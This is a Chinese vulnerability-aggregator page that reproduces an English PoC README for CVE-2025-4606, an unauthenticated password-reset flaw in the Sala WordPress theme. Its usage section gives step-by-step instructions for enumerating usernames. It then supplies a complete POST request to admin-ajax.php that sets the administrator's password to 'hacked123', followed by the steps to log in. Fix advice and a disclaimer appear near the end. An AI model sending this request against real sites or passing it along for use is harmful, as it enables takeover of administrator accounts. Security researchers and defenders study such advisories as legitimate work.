关联漏洞
标题:
WordPress plugin Sala 安全漏洞
(CVE-2025-4606)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Sala 1.1.4及之前版本存在安全漏洞,该漏洞源于未正确验证用户身份,可能导致账户接管和权限提升。
描述
Sala - Startup & SaaS WordPress Theme <= 1.1.4 - Unauthenticated Privilege Escalation via Password Reset/Account Takeover
介绍
# CVE-2025-4606- WordPress Sala Theme <= 1.1.4 - Unauthenticated Privilege Escalation via Password Reset/Account Takeover
🔥 **Vulnerability Summary**
The WordPress theme Sala versions <= 1.1.4 is vulnerable to an **unauthenticated privilege escalation** vulnerability. This flaw allows **unauthenticated attackers** to reset passwords of arbitrary users — including administrators — by directly invoking an exposed AJAX endpoint without verifying the identity of the requester.
This vulnerability stems from the `change_password_ajax` function registered to `wp_ajax_nopriv_`, which sets a new password for any valid user login without checking if the request is authorized.
🔍 **Affected Theme**
- **Theme Name:** Sala – Startup & SaaS WordPress Theme
- **Affected Version:** <= 1.1.4
- **Vulnerability Type:** Unauthenticated Privilege Escalation
- **CVE ID:** CVE-2025-4606
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Complete Account Takeover (Including Admin)
🧪 **Exploit Features**
- 🔓 **No authentication required**
- 🔄 **Overwrites any user’s password** by providing a valid login name
- 📬 **Targets the AJAX endpoint** `/wp-admin/admin-ajax.php?action=change_password_ajax`
- 🧠 **Works instantly** if the attacker knows a valid username (e.g., admin)
🧠 **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
🚀 **Usage**
1. Identify a valid username on the target WordPress site. You can do this by checking:
- Public author archive URLs (`/author/username`)
2. Craft the following POST request to reset the user’s password:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
```
3. If successful, you can now log in as the targeted user using the new password (`hacked123` in the example above).
4. Visit `/wp-login.php` and verify access.
🛠 **Fix Recommendations**
- Theme developers should remove or secure the `wp_ajax_nopriv_change_password_ajax` hook.
- Always check `is_user_logged_in()` and verify the identity of the user before allowing sensitive actions.
- Implement nonce checks to prevent CSRF and unauthenticated abuse.
🔒 **Disclaimer:**
This information is provided for educational and authorized penetration testing purposes only. Unauthorized exploitation of systems is illegal and unethical.
📚 **Reference:**
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/sala/sala-startup-saas-wordpress-theme-114-unauthenticated-privilege-escalation-via-password-resetaccount-takeover)
文件快照
[4.0K] /data/pocs/f69096039cc67abbecae62d317f14b0dde3747d8
├── [ 758] exp.py
└── [2.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。